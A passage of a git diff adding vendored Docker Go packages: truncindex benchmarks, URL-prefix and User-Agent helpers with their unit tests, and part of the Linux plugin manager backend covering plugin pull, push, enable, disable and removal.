+		index := NewTruncIndex([]string{})
+		for _, id := range testSet {
+			if err := index.Add(id); err != nil {
+				b.Fatal(err)
+			}
+		}
+	}
+}
+
+func BenchmarkTruncIndexGet100(b *testing.B) {
+	var testSet []string
+	var testKeys []string
+	for i := 0; i < 100; i++ {
+		testSet = append(testSet, stringid.GenerateNonCryptoID())
+	}
+	index := NewTruncIndex([]string{})
+	for _, id := range testSet {
+		if err := index.Add(id); err != nil {
+			b.Fatal(err)
+		}
+		l := rand.Intn(12) + 12
+		testKeys = append(testKeys, id[:l])
+	}
+	b.ResetTimer()
+	for i := 0; i < b.N; i++ {
+		for _, id := range testKeys {
+			if res, err := index.Get(id); err != nil {
+				b.Fatal(res, err)
+			}
+		}
+	}
+}
+
+func BenchmarkTruncIndexGet250(b *testing.B) {
+	var testSet []string
+	var testKeys []string
+	for i := 0; i < 250; i++ {
+		testSet = append(testSet, stringid.GenerateNonCryptoID())
+	}
+	index := NewTruncIndex([]string{})
+	for _, id := range testSet {
+		if err := index.Add(id); err != nil {
+			b.Fatal(err)
+		}
+		l := rand.Intn(12) + 12
+		testKeys = append(testKeys, id[:l])
+	}
+	b.ResetTimer()
+	for i := 0; i < b.N; i++ {
+		for _, id := range testKeys {
+			if res, err := index.Get(id); err != nil {
+				b.Fatal(res, err)
+			}
+		}
+	}
+}
+
+func BenchmarkTruncIndexGet500(b *testing.B) {
+	var testSet []string
+	var testKeys []string
+	for i := 0; i < 500; i++ {
+		testSet = append(testSet, stringid.GenerateNonCryptoID())
+	}
+	index := NewTruncIndex([]string{})
+	for _, id := range testSet {
+		if err := index.Add(id); err != nil {
+			b.Fatal(err)
+		}
+		l := rand.Intn(12) + 12
+		testKeys = append(testKeys, id[:l])
+	}
+	b.ResetTimer()
+	for i := 0; i < b.N; i++ {
+		for _, id := range testKeys {
+			if res, err := index.Get(id); err != nil {
+				b.Fatal(res, err)
+			}
+		}
+	}
+}
+
+func BenchmarkTruncIndexDelete100(b *testing.B) {
+	var testSet []string
+	for i := 0; i < 100; i++ {
+		testSet = append(testSet, stringid.GenerateNonCryptoID())
+	}
+	b.ResetTimer()
+	for i := 0; i < b.N; i++ {
+		b.StopTimer()
+		index := NewTruncIndex([]string{})
+		for _, id := range testSet {
+			if err := index.Add(id); err != nil {
+				b.Fatal(err)
+			}
+		}
+		b.StartTimer()
+		for _, id := range testSet {
+			if err := index.Delete(id); err != nil {
+				b.Fatal(err)
+			}
+		}
+	}
+}
+
+func BenchmarkTruncIndexDelete250(b *testing.B) {
+	var testSet []string
+	for i := 0; i < 250; i++ {
+		testSet = append(testSet, stringid.GenerateNonCryptoID())
+	}
+	b.ResetTimer()
+	for i := 0; i < b.N; i++ {
+		b.StopTimer()
+		index := NewTruncIndex([]string{})
+		for _, id := range testSet {
+			if err := index.Add(id); err != nil {
+				b.Fatal(err)
+			}
+		}
+		b.StartTimer()
+		for _, id := range testSet {
+			if err := index.Delete(id); err != nil {
+				b.Fatal(err)
+			}
+		}
+	}
+}
+
+func BenchmarkTruncIndexDelete500(b *testing.B) {
+	var testSet []string
+	for i := 0; i < 500; i++ {
+		testSet = append(testSet, stringid.GenerateNonCryptoID())
+	}
+	b.ResetTimer()
+	for i := 0; i < b.N; i++ {
+		b.StopTimer()
+		index := NewTruncIndex([]string{})
+		for _, id := range testSet {
+			if err := index.Add(id); err != nil {
+				b.Fatal(err)
+			}
+		}
+		b.StartTimer()
+		for _, id := range testSet {
+			if err := index.Delete(id); err != nil {
+				b.Fatal(err)
+			}
+		}
+	}
+}
+
+func BenchmarkTruncIndexNew100(b *testing.B) {
+	var testSet []string
+	for i := 0; i < 100; i++ {
+		testSet = append(testSet, stringid.GenerateNonCryptoID())
+	}
+	b.ResetTimer()
+	for i := 0; i < b.N; i++ {
+		NewTruncIndex(testSet)
+	}
+}
+
+func BenchmarkTruncIndexNew250(b *testing.B) {
+	var testSet []string
+	for i := 0; i < 250; i++ {
+		testSet = append(testSet, stringid.GenerateNonCryptoID())
+	}
+	b.ResetTimer()
+	for i := 0; i < b.N; i++ {
+		NewTruncIndex(testSet)
+	}
+}
+
+func BenchmarkTruncIndexNew500(b *testing.B) {
+	var testSet []string
+	for i := 0; i < 500; i++ {
+		testSet = append(testSet, stringid.GenerateNonCryptoID())
+	}
+	b.ResetTimer()
+	for i := 0; i < b.N; i++ {
+		NewTruncIndex(testSet)
+	}
+}
+
+func BenchmarkTruncIndexAddGet100(b *testing.B) {
+	var testSet []string
+	var testKeys []string
+	for i := 0; i < 500; i++ {
+		id := stringid.GenerateNonCryptoID()
+		testSet = append(testSet, id)
+		l := rand.Intn(12) + 12
+		testKeys = append(testKeys, id[:l])
+	}
+	b.ResetTimer()
+	for i := 0; i < b.N; i++ {
+		index := NewTruncIndex([]string{})
+		for _, id := range testSet {
+			if err := index.Add(id); err != nil {
+				b.Fatal(err)
+			}
+		}
+		for _, id := range testKeys {
+			if res, err := index.Get(id); err != nil {
+				b.Fatal(res, err)
+			}
+		}
+	}
+}
+
+func BenchmarkTruncIndexAddGet250(b *testing.B) {
+	var testSet []string
+	var testKeys []string
+	for i := 0; i < 500; i++ {
+		id := stringid.GenerateNonCryptoID()
+		testSet = append(testSet, id)
+		l := rand.Intn(12) + 12
+		testKeys = append(testKeys, id[:l])
+	}
+	b.ResetTimer()
+	for i := 0; i < b.N; i++ {
+		index := NewTruncIndex([]string{})
+		for _, id := range testSet {
+			if err := index.Add(id); err != nil {
+				b.Fatal(err)
+			}
+		}
+		for _, id := range testKeys {
+			if res, err := index.Get(id); err != nil {
+				b.Fatal(res, err)
+			}
+		}
+	}
+}
+
+func BenchmarkTruncIndexAddGet500(b *testing.B) {
+	var testSet []string
+	var testKeys []string
+	for i := 0; i < 500; i++ {
+		id := stringid.GenerateNonCryptoID()
+		testSet = append(testSet, id)
+		l := rand.Intn(12) + 12
+		testKeys = append(testKeys, id[:l])
+	}
+	b.ResetTimer()
+	for i := 0; i < b.N; i++ {
+		index := NewTruncIndex([]string{})
+		for _, id := range testSet {
+			if err := index.Add(id); err != nil {
+				b.Fatal(err)
+			}
+		}
+		for _, id := range testKeys {
+			if res, err := index.Get(id); err != nil {
+				b.Fatal(res, err)
+			}
+		}
+	}
+}
diff --git a/vendor/github.com/docker/docker/pkg/urlutil/urlutil.go b/vendor/github.com/docker/docker/pkg/urlutil/urlutil.go
new file mode 100644
index 0000000000..44152873b1
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/urlutil/urlutil.go
@@ -0,0 +1,50 @@
+// Package urlutil provides helper function to check urls kind.
+// It supports http urls, git urls and transport url (tcp://, …)
+package urlutil
+
+import (
+	"regexp"
+	"strings"
+)
+
+var (
+	validPrefixes = map[string][]string{
+		"url":       {"http://", "https://"},
+		"git":       {"git://", "github.com/", "git@"},
+		"transport": {"tcp://", "tcp+tls://", "udp://", "unix://", "unixgram://"},
+	}
+	urlPathWithFragmentSuffix = regexp.MustCompile(".git(?:#.+)?$")
+)
+
+// IsURL returns true if the provided str is an HTTP(S) URL.
+func IsURL(str string) bool {
+	return checkURL(str, "url")
+}
+
+// IsGitURL returns true if the provided str is a git repository URL.
+func IsGitURL(str string) bool {
+	if IsURL(str) && urlPathWithFragmentSuffix.MatchString(str) {
+		return true
+	}
+	return checkURL(str, "git")
+}
+
+// IsGitTransport returns true if the provided str is a git transport by inspecting
+// the prefix of the string for known protocols used in git.
+func IsGitTransport(str string) bool {
+	return IsURL(str) || strings.HasPrefix(str, "git://") || strings.HasPrefix(str, "git@")
+}
+
+// IsTransportURL returns true if the provided str is a transport (tcp, tcp+tls, udp, unix) URL.
+func IsTransportURL(str string) bool {
+	return checkURL(str, "transport")
+}
+
+func checkURL(str, kind string) bool {
+	for _, prefix := range validPrefixes[kind] {
+		if strings.HasPrefix(str, prefix) {
+			return true
+		}
+	}
+	return false
+}
diff --git a/vendor/github.com/docker/docker/pkg/urlutil/urlutil_test.go b/vendor/github.com/docker/docker/pkg/urlutil/urlutil_test.go
new file mode 100644
index 0000000000..75eb464fe5
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/urlutil/urlutil_test.go
@@ -0,0 +1,70 @@
+package urlutil
+
+import "testing"
+
+var (
+	gitUrls = []string{
+		"git://github.com/docker/docker",
+		"git@github.com:docker/docker.git",
+		"git@bitbucket.org:atlassianlabs/atlassian-docker.git",
+		"https://github.com/docker/docker.git",
+		"http://github.com/docker/docker.git",
+		"http://github.com/docker/docker.git#branch",
+		"http://github.com/docker/docker.git#:dir",
+	}
+	incompleteGitUrls = []string{
+		"github.com/docker/docker",
+	}
+	invalidGitUrls = []string{
+		"http://github.com/docker/docker.git:#branch",
+	}
+	transportUrls = []string{
+		"tcp://example.com",
+		"tcp+tls://example.com",
+		"udp://example.com",
+		"unix:///example",
+		"unixgram:///example",
+	}
+)
+
+func TestValidGitTransport(t *testing.T) {
+	for _, url := range gitUrls {
+		if IsGitTransport(url) == false {
+			t.Fatalf("%q should be detected as valid Git prefix", url)
+		}
+	}
+
+	for _, url := range incompleteGitUrls {
+		if IsGitTransport(url) == true {
+			t.Fatalf("%q should not be detected as valid Git prefix", url)
+		}
+	}
+}
+
+func TestIsGIT(t *testing.T) {
+	for _, url := range gitUrls {
+		if IsGitURL(url) == false {
+			t.Fatalf("%q should be detected as valid Git url", url)
+		}
+	}
+
+	for _, url := range incompleteGitUrls {
+		if IsGitURL(url) == false {
+			t.Fatalf("%q should be detected as valid Git url", url)
+		}
+	}
+
+	for _, url := range invalidGitUrls {
+		if IsGitURL(url) == true {
+			t.Fatalf("%q should not be detected as valid Git prefix", url)
+		}
+	}
+}
+
+func TestIsTransport(t *testing.T) {
+	for _, url := range transportUrls {
+		if IsTransportURL(url) == false {
+			t.Fatalf("%q should be detected as valid Transport url", url)
+		}
+	}
+}
diff --git a/vendor/github.com/docker/docker/pkg/useragent/README.md b/vendor/github.com/docker/docker/pkg/useragent/README.md
new file mode 100644
index 0000000000..d9cb367d10
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/useragent/README.md
@@ -0,0 +1 @@
+This package provides helper functions to pack version information into a single User-Agent header.
diff --git a/vendor/github.com/docker/docker/pkg/useragent/useragent.go b/vendor/github.com/docker/docker/pkg/useragent/useragent.go
new file mode 100644
index 0000000000..1137db51b8
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/useragent/useragent.go
@@ -0,0 +1,55 @@
+// Package useragent provides helper functions to pack
+// version information into a single User-Agent header.
+package useragent
+
+import (
+	"strings"
+)
+
+// VersionInfo is used to model UserAgent versions.
+type VersionInfo struct {
+	Name    string
+	Version string
+}
+
+func (vi *VersionInfo) isValid() bool {
+	const stopChars = " \t\r\n/"
+	name := vi.Name
+	vers := vi.Version
+	if len(name) == 0 || strings.ContainsAny(name, stopChars) {
+		return false
+	}
+	if len(vers) == 0 || strings.ContainsAny(vers, stopChars) {
+		return false
+	}
+	return true
+}
+
+// AppendVersions converts versions to a string and appends the string to the string base.
+//
+// Each VersionInfo will be converted to a string in the format of
+// "product/version", where the "product" is get from the name field, while
+// version is get from the version field. Several pieces of version information
+// will be concatenated and separated by space.
+//
+// Example:
+// AppendVersions("base", VersionInfo{"foo", "1.0"}, VersionInfo{"bar", "2.0"})
+// results in "base foo/1.0 bar/2.0".
+func AppendVersions(base string, versions ...VersionInfo) string {
+	if len(versions) == 0 {
+		return base
+	}
+
+	verstrs := make([]string, 0, 1+len(versions))
+	if len(base) > 0 {
+		verstrs = append(verstrs, base)
+	}
+
+	for _, v := range versions {
+		if !v.isValid() {
+			continue
+		}
+		verstrs = append(verstrs, v.Name+"/"+v.Version)
+	}
+	return strings.Join(verstrs, " ")
+}
diff --git a/vendor/github.com/docker/docker/pkg/useragent/useragent_test.go b/vendor/github.com/docker/docker/pkg/useragent/useragent_test.go
new file mode 100644
index 0000000000..0ad7243a6d
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/useragent/useragent_test.go
@@ -0,0 +1,31 @@
+package useragent
+
+import "testing"
+
+func TestVersionInfo(t *testing.T) {
+	vi := VersionInfo{"foo", "bar"}
+	if !vi.isValid() {
+		t.Fatalf("VersionInfo should be valid")
+	}
+	vi = VersionInfo{"", "bar"}
+	if vi.isValid() {
+		t.Fatalf("Expected VersionInfo to be invalid")
+	}
+	vi = VersionInfo{"foo", ""}
+	if vi.isValid() {
+		t.Fatalf("Expected VersionInfo to be invalid")
+	}
+}
+
+func TestAppendVersions(t *testing.T) {
+	vis := []VersionInfo{
+		{"foo", "1.0"},
+		{"bar", "0.1"},
+		{"pi", "3.1.4"},
+	}
+	v := AppendVersions("base", vis...)
+	expect := "base foo/1.0 bar/0.1 pi/3.1.4"
+	if v != expect {
+		t.Fatalf("expected %q, got %q", expect, v)
+	}
+}
diff --git a/vendor/github.com/docker/docker/plugin/backend_linux.go b/vendor/github.com/docker/docker/plugin/backend_linux.go
new file mode 100644
index 0000000000..33200d8efa
--- /dev/null
+++ b/vendor/github.com/docker/docker/plugin/backend_linux.go
@@ -0,0 +1,790 @@
+// +build linux
+
+package plugin
+
+import (
+	"archive/tar"
+	"compress/gzip"
+	"encoding/json"
+	"fmt"
+	"io"
+	"io/ioutil"
+	"net/http"
+	"os"
+	"path"
+	"path/filepath"
+	"sort"
+	"strings"
+
+	"github.com/Sirupsen/logrus"
+	"github.com/docker/distribution/digest"
+	"github.com/docker/distribution/manifest/schema2"
+	"github.com/docker/docker/api/types"
+	"github.com/docker/docker/distribution"
+	progressutils "github.com/docker/docker/distribution/utils"
+	"github.com/docker/docker/distribution/xfer"
+	"github.com/docker/docker/image"
+	"github.com/docker/docker/layer"
+	"github.com/docker/docker/pkg/chrootarchive"
+	"github.com/docker/docker/pkg/mount"
+	"github.com/docker/docker/pkg/pools"
+	"github.com/docker/docker/pkg/progress"
+	"github.com/docker/docker/plugin/v2"
+	"github.com/docker/docker/reference"
+	"github.com/pkg/errors"
+	"golang.org/x/net/context"
+)
+
+// Disable deactivates a plugin. This means resources (volumes, networks) cant use them.
+func (pm *Manager) Disable(refOrID string, config *types.PluginDisableConfig) error {
+	p, err := pm.config.Store.GetV2Plugin(refOrID)
+	if err != nil {
+		return err
+	}
+	pm.mu.RLock()
+	c := pm.cMap[p]
+	pm.mu.RUnlock()
+
+	if !config.ForceDisable && p.GetRefCount() > 0 {
+		return fmt.Errorf("plugin %s is in use", p.Name())
+	}
+
+	if err := pm.disable(p, c); err != nil {
+		return err
+	}
+	pm.config.LogPluginEvent(p.GetID(), refOrID, "disable")
+	return nil
+}
+
+// Enable activates a plugin, which implies that they are ready to be used by containers.
+func (pm *Manager) Enable(refOrID string, config *types.PluginEnableConfig) error {
+	p, err := pm.config.Store.GetV2Plugin(refOrID)
+	if err != nil {
+		return err
+	}
+
+	c := &controller{timeoutInSecs: config.Timeout}
+	if err := pm.enable(p, c, false); err != nil {
+		return err
+	}
+	pm.config.LogPluginEvent(p.GetID(), refOrID, "enable")
+	return nil
+}
+
+// Inspect examines a plugin config
+func (pm *Manager) Inspect(refOrID string) (tp *types.Plugin, err error) {
+	p, err := pm.config.Store.GetV2Plugin(refOrID)
+	if err != nil {
+		return nil, err
+	}
+
+	return &p.PluginObj, nil
+}
+
+func (pm *Manager) pull(ctx context.Context, ref reference.Named, config *distribution.ImagePullConfig, outStream io.Writer) error {
+	if outStream != nil {
+		// Include a buffer so that slow client connections don't affect
+		// transfer performance.
+		progressChan := make(chan progress.Progress, 100)
+
+		writesDone := make(chan struct{})
+
+		defer func() {
+			close(progressChan)
+			<-writesDone
+		}()
+
+		var cancelFunc context.CancelFunc
+		ctx, cancelFunc = context.WithCancel(ctx)
+
+		go func() {
+			progressutils.WriteDistributionProgress(cancelFunc, outStream, progressChan)
+			close(writesDone)
+		}()
+
+		config.ProgressOutput = progress.ChanOutput(progressChan)
+	} else {
+		config.ProgressOutput = progress.DiscardOutput()
+	}
+	return distribution.Pull(ctx, ref, config)
+}
+
+type tempConfigStore struct {
+	config       []byte
+	configDigest digest.Digest
+}
+
+func (s *tempConfigStore) Put(c []byte) (digest.Digest, error) {
+	dgst := digest.FromBytes(c)
+
+	s.config = c
+	s.configDigest = dgst
+
+	return dgst, nil
+}
+
+func (s *tempConfigStore) Get(d digest.Digest) ([]byte, error) {
+	if d != s.configDigest {
+		return nil, digest.ErrDigestNotFound
+	}
+	return s.config, nil
+}
+
+func (s *tempConfigStore) RootFSFromConfig(c []byte) (*image.RootFS, error) {
+	return configToRootFS(c)
+}
+
+func computePrivileges(c types.PluginConfig) (types.PluginPrivileges, error) {
+	var privileges types.PluginPrivileges
+	if c.Network.Type != "null" && c.Network.Type != "bridge" && c.Network.Type != "" {
+		privileges = append(privileges, types.PluginPrivilege{
+			Name:        "network",
+			Description: "permissions to access a network",
+			Value:       []string{c.Network.Type},
+		})
+	}
+	for _, mount := range c.Mounts {
+		if mount.Source != nil {
+			privileges = append(privileges, types.PluginPrivilege{
+				Name:        "mount",
+				Description: "host path to mount",
+				Value:       []string{*mount.Source},
+			})
+		}
+	}
+	for _, device := range c.Linux.Devices {
+		if device.Path != nil {
+			privileges = append(privileges, types.PluginPrivilege{
+				Name:        "device",
+				Description: "host device to access",
+				Value:       []string{*device.Path},
+			})
+		}
+	}
+	if c.Linux.AllowAllDevices {
+		privileges = append(privileges, types.PluginPrivilege{
+			Name:        "allow-all-devices",
+			Description: "allow 'rwm' access to all devices",
+			Value:       []string{"true"},
+		})
+	}
+	if len(c.Linux.Capabilities) > 0 {
+		privileges = append(privileges, types.PluginPrivilege{
+			Name:        "capabilities",
+			Description: "list of additional capabilities required",
+			Value:       c.Linux.Capabilities,
+		})
+	}
+
+	return privileges, nil
+}
+
+// Privileges pulls a plugin config and computes the privileges required to install it.
+func (pm *Manager) Privileges(ctx context.Context, ref reference.Named, metaHeader http.Header, authConfig *types.AuthConfig) (types.PluginPrivileges, error) {
+	// create image store instance
+	cs := &tempConfigStore{}
+
+	// DownloadManager not defined because only pulling configuration.
+	pluginPullConfig := &distribution.ImagePullConfig{
+		Config: distribution.Config{
+			MetaHeaders:      metaHeader,
+			AuthConfig:       authConfig,
+			RegistryService:  pm.config.RegistryService,
+			ImageEventLogger: func(string, string, string) {},
+			ImageStore:       cs,
+		},
+		Schema2Types: distribution.PluginTypes,
+	}
+
+	if err := pm.pull(ctx, ref, pluginPullConfig, nil); err != nil {
+		return nil, err
+	}
+
+	if cs.config == nil {
+		return nil, errors.New("no configuration pulled")
+	}
+	var config types.PluginConfig
+	if err := json.Unmarshal(cs.config, &config); err != nil {
+		return nil, err
+	}
+
+	return computePrivileges(config)
+}
+
+// Upgrade upgrades a plugin
+func (pm *Manager) Upgrade(ctx context.Context, ref reference.Named, name string, metaHeader http.Header, authConfig *types.AuthConfig, privileges types.PluginPrivileges, outStream io.Writer) (err error) {
+	p, err := pm.config.Store.GetV2Plugin(name)
+	if err != nil {
+		return errors.Wrap(err, "plugin must be installed before upgrading")
+	}
+
+	if p.IsEnabled() {
+		return fmt.Errorf("plugin must be disabled before upgrading")
+	}
+
+	pm.muGC.RLock()
+	defer pm.muGC.RUnlock()
+
+	// revalidate because Pull is public
+	nameref, err := reference.ParseNamed(name)
+	if err != nil {
+		return errors.Wrapf(err, "failed to parse %q", name)
+	}
+	name = reference.WithDefaultTag(nameref).String()
+
+	tmpRootFSDir, err := ioutil.TempDir(pm.tmpDir(), ".rootfs")
+	defer os.RemoveAll(tmpRootFSDir)
+
+	dm := &downloadManager{
+		tmpDir:    tmpRootFSDir,
+		blobStore: pm.blobStore,
+	}
+
+	pluginPullConfig := &distribution.ImagePullConfig{
+		Config: distribution.Config{
+			MetaHeaders:      metaHeader,
+			AuthConfig:       authConfig,
+			RegistryService:  pm.config.RegistryService,
+			ImageEventLogger: pm.config.LogPluginEvent,
+			ImageStore:       dm,
+		},
+		DownloadManager: dm, // todo: reevaluate if possible to substitute distribution/xfer dependencies instead
+		Schema2Types:    distribution.PluginTypes,
+	}
+
+	err = pm.pull(ctx, ref, pluginPullConfig, outStream)
+	if err != nil {
+		go pm.GC()
+		return err
+	}
+
+	if err := pm.upgradePlugin(p, dm.configDigest, dm.blobs, tmpRootFSDir, &privileges); err != nil {
+		return err
+	}
+	p.PluginObj.PluginReference = ref.String()
+	return nil
+}
+
+// Pull pulls a plugin, check if the correct privileges are provided and install the plugin.
+func (pm *Manager) Pull(ctx context.Context, ref reference.Named, name string, metaHeader http.Header, authConfig *types.AuthConfig, privileges types.PluginPrivileges, outStream io.Writer) (err error) {
+	pm.muGC.RLock()
+	defer pm.muGC.RUnlock()
+
+	// revalidate because Pull is public
+	nameref, err := reference.ParseNamed(name)
+	if err != nil {
+		return errors.Wrapf(err, "failed to parse %q", name)
+	}
+	name = reference.WithDefaultTag(nameref).String()
+
+	if err := pm.config.Store.validateName(name); err != nil {
+		return err
+	}
+
+	tmpRootFSDir, err := ioutil.TempDir(pm.tmpDir(), ".rootfs")
+	defer os.RemoveAll(tmpRootFSDir)
+
+	dm := &downloadManager{
+		tmpDir:    tmpRootFSDir,
+		blobStore: pm.blobStore,
+	}
+
+	pluginPullConfig := &distribution.ImagePullConfig{
+		Config: distribution.Config{
+			MetaHeaders:      metaHeader,
+			AuthConfig:       authConfig,
+			RegistryService:  pm.config.RegistryService,
+			ImageEventLogger: pm.config.LogPluginEvent,
+			ImageStore:       dm,
+		},
+		DownloadManager: dm, // todo: reevaluate if possible to substitute distribution/xfer dependencies instead
+		Schema2Types:    distribution.PluginTypes,
+	}
+
+	err = pm.pull(ctx, ref, pluginPullConfig, outStream)
+	if err != nil {
+		go pm.GC()
+		return err
+	}
+
+	p, err := pm.createPlugin(name, dm.configDigest, dm.blobs, tmpRootFSDir, &privileges)
+	if err != nil {
+		return err
+	}
+	p.PluginObj.PluginReference = ref.String()
+
+	return nil
+}
+
+// List displays the list of plugins and associated metadata.
+func (pm *Manager) List() ([]types.Plugin, error) {
+	plugins := pm.config.Store.GetAll()
+	out := make([]types.Plugin, 0, len(plugins))
+	for _, p := range plugins {
+		out = append(out, p.PluginObj)
+	}
+	return out, nil
+}
+
+// Push pushes a plugin to the store.
+func (pm *Manager) Push(ctx context.Context, name string, metaHeader http.Header, authConfig *types.AuthConfig, outStream io.Writer) error {
+	p, err := pm.config.Store.GetV2Plugin(name)
+	if err != nil {
+		return err
+	}
+
+	ref, err := reference.ParseNamed(p.Name())
+	if err != nil {
+		return errors.Wrapf(err, "plugin has invalid name %v for push", p.Name())
+	}
+
+	var po progress.Output
+	if outStream != nil {
+		// Include a buffer so that slow client connections don't affect
+		// transfer performance.
+		progressChan := make(chan progress.Progress, 100)
+
+		writesDone := make(chan struct{})
+
+		defer func() {
+			close(progressChan)
+			<-writesDone
+		}()
+
+		var cancelFunc context.CancelFunc
+		ctx, cancelFunc = context.WithCancel(ctx)
+
+		go func() {
+			progressutils.WriteDistributionProgress(cancelFunc, outStream, progressChan)
+			close(writesDone)
+		}()
+
+		po = progress.ChanOutput(progressChan)
+	} else {
+		po = progress.DiscardOutput()
+	}
+
+	// TODO: replace these with manager
+	is := &pluginConfigStore{
+		pm:     pm,
+		plugin: p,
+	}
+	ls := &pluginLayerProvider{
+		pm:     pm,
+		plugin: p,
+	}
+	rs := &pluginReference{
+		name:     ref,
+		pluginID: p.Config,
+	}
+
+	uploadManager := xfer.NewLayerUploadManager(3)
+
+	imagePushConfig := &distribution.ImagePushConfig{
+		Config: distribution.Config{
+			MetaHeaders:      metaHeader,
+			AuthConfig:       authConfig,
+			ProgressOutput:   po,
+			RegistryService:  pm.config.RegistryService,
+			ReferenceStore:   rs,
+			ImageEventLogger: pm.config.LogPluginEvent,
+			ImageStore:       is,
+			RequireSchema2:   true,
+		},
+		ConfigMediaType: schema2.MediaTypePluginConfig,
+		LayerStore:      ls,
+		UploadManager:   uploadManager,
+	}
+
+	return distribution.Push(ctx, ref, imagePushConfig)
+}
+
+type pluginReference struct {
+	name     reference.Named
+	pluginID digest.Digest
+}
+
+func (r *pluginReference) References(id digest.Digest) []reference.Named {
+	if r.pluginID != id {
+		return nil
+	}
+	return []reference.Named{r.name}
+}
+
+func (r *pluginReference) ReferencesByName(ref reference.Named) []reference.Association {
+	return []reference.Association{
+		{
+			Ref: r.name,
+			ID:  r.pluginID,
+		},
+	}
+}
+
+func (r *pluginReference) Get(ref reference.Named) (digest.Digest, error) {
+	if r.name.String() != ref.String() {
+		return digest.Digest(""), reference.ErrDoesNotExist
+	}
+	return r.pluginID, nil
+}
+
+func (r *pluginReference) AddTag(ref reference.Named, id digest.Digest, force bool) error {
+	// Read only, ignore
+	return nil
+}
+func (r *pluginReference) AddDigest(ref reference.Canonical, id digest.Digest, force bool) error {
+	// Read only, ignore
+	return nil
+}
+func (r *pluginReference) Delete(ref reference.Named) (bool, error) {
+	// Read only, ignore
+	return false, nil
+}
+
+type pluginConfigStore struct {
+	pm     *Manager
+	plugin *v2.Plugin
+}
+
+func (s *pluginConfigStore) Put([]byte) (digest.Digest, error) {
+	return digest.Digest(""), errors.New("cannot store config on push")
+}
+
+func (s *pluginConfigStore) Get(d digest.Digest) ([]byte, error) {
+	if s.plugin.Config != d {
+		return nil, errors.New("plugin not found")
+	}
+	rwc, err := s.pm.blobStore.Get(d)
+	if err != nil {
+		return nil, err
+	}
+	defer rwc.Close()
+	return ioutil.ReadAll(rwc)
+}
+
+func (s *pluginConfigStore) RootFSFromConfig(c []byte) (*image.RootFS, error) {
+	return configToRootFS(c)
+}
+
+type pluginLayerProvider struct {
+	pm     *Manager
+	plugin *v2.Plugin
+}
+
+func (p *pluginLayerProvider) Get(id layer.ChainID) (distribution.PushLayer, error) {
+	rootFS := rootFSFromPlugin(p.plugin.PluginObj.Config.Rootfs)
+	var i int
+	for i = 1; i <= len(rootFS.DiffIDs); i++ {
+		if layer.CreateChainID(rootFS.DiffIDs[:i]) == id {
+			break
+		}
+	}
+	if i > len(rootFS.DiffIDs) {
+		return nil, errors.New("layer not found")
+	}
+	return &pluginLayer{
+		pm:      p.pm,
+		diffIDs: rootFS.DiffIDs[:i],
+		blobs:   p.plugin.Blobsums[:i],
+	}, nil
+}
+
+type pluginLayer struct {
+	pm      *Manager
+	diffIDs []layer.DiffID
+	blobs   []digest.Digest
+}
+
+func (l *pluginLayer) ChainID() layer.ChainID {
+	return layer.CreateChainID(l.diffIDs)
+}
+
+func (l *pluginLayer) DiffID() layer.DiffID {
+	return l.diffIDs[len(l.diffIDs)-1]
+}
+
+func (l *pluginLayer) Parent() distribution.PushLayer {
+	if len(l.diffIDs) == 1 {
+		return nil
+	}
+	return &pluginLayer{
+		pm:      l.pm,
+		diffIDs: l.diffIDs[:len(l.diffIDs)-1],
+		blobs:   l.blobs[:len(l.diffIDs)-1],
+	}
+}
+
+func (l *pluginLayer) Open() (io.ReadCloser, error) {
+	return l.pm.blobStore.Get(l.blobs[len(l.diffIDs)-1])
+}
+
+func (l *pluginLayer) Size() (int64, error) {
+	return l.pm.blobStore.Size(l.blobs[len(l.diffIDs)-1])
+}
+
+func (l *pluginLayer) MediaType() string {
+	return schema2.MediaTypeLayer
+}
+
+func (l *pluginLayer) Release() {
+	// Nothing needs to be release, no references held
+}
+
+// Remove deletes plugin's root directory.
+func (pm *Manager) Remove(name string, config *types.PluginRmConfig) error {
+	p, err := pm.config.Store.GetV2Plugin(name)
+	pm.mu.RLock()
+	c := pm.cMap[p]
+	pm.mu.RUnlock()
+
+	if err != nil {
+		return err
+	}
+
+	if !config.ForceRemove {
+		if p.GetRefCount() > 0 {
+			return fmt.Errorf("plugin %s is in use", p.Name())
+		}
+		if p.IsEnabled() {
+			return fmt.Errorf("plugin %s is enabled", p.Name())
+		}
+	}
+
+	if p.IsEnabled() {
+		if err := pm.disable(p, c); err != nil {
+			logrus.Errorf("failed to disable plugin '%s': %s", p.Name(), err)
+		}
+	}
+
+	defer func() {
+		go pm.GC()
+	}()
+
+	id := p.GetID()
+	pm.config.Store.Remove(p)
+	pluginDir := filepath.Join(pm.config.Root, id)
+	if err := recursiveUnmount(pm.config.Root); err != nil {
+		logrus.WithField("dir", pm.config.Root).WithField("id", id).Warn(err)
+	}
+	if err := os.RemoveAll(pluginDir); err != nil {
+		logrus.Warnf("unable to remove %q from plugin remove: %v", pluginDir, err)
+	}
+	pm.config.LogPluginEvent(id, name, "remove")
+	return nil
+}
+
+func getMounts(root string) ([]string, error) {
+	infos, err := mount.GetMounts()
+	if err != nil {
+		return nil, errors.Wrap(err, "failed to read mount table while performing recursive unmount")
+	}
+
+	var mounts []string
+	for _, m := range infos {
+		if strings.HasPrefix(m.Mountpoint, root) {
+			mounts = append(mounts, m.Mountpoint)
+		}
+	}
+
+	return mounts, nil
+}
+
+func recursiveUnmount(root string) error {
+	mounts, err := getMounts(root)
+	if err != nil {
+		return err
+	}
+
+	// sort in reverse-lexicographic order so the root mount will always be last
+	sort.Sort(sort.Reverse(sort.StringSlice(mounts)))
+
+	for i, m := range mounts {
+		if err := mount.Unmount(m); err != nil {
+			if i == len(mounts)-1 {
+				return errors.Wrapf(err, "error performing recursive unmount on %s", root)
+			}
+			logrus.WithError(err).WithField("mountpoint", m).Warn("could not unmount")
+		}
+	}
+
+	return nil
+}
+
+// Set sets plugin args
+func (pm *Manager) Set(name string, args []string) error {
+	p, err := pm.config.Store.GetV2Plugin(name)
+	if err != nil {
+		return err
+	}
+	if err := p.Set(args); err != nil {
+		return err
+	}
+	return pm.save(p)
+}
+
+// CreateFromContext creates a plugin from the given pluginDir which contains
+// both the rootfs and the config.json and a repoName with optional tag.
+func (pm *Manager) CreateFromContext(ctx context.Context, tarCtx io.ReadCloser, options *types.PluginCreateOptions) (err error) {
+	pm.muGC.RLock()
+	defer pm.muGC.RUnlock()
+
+	ref, err := reference.ParseNamed(options.RepoName)
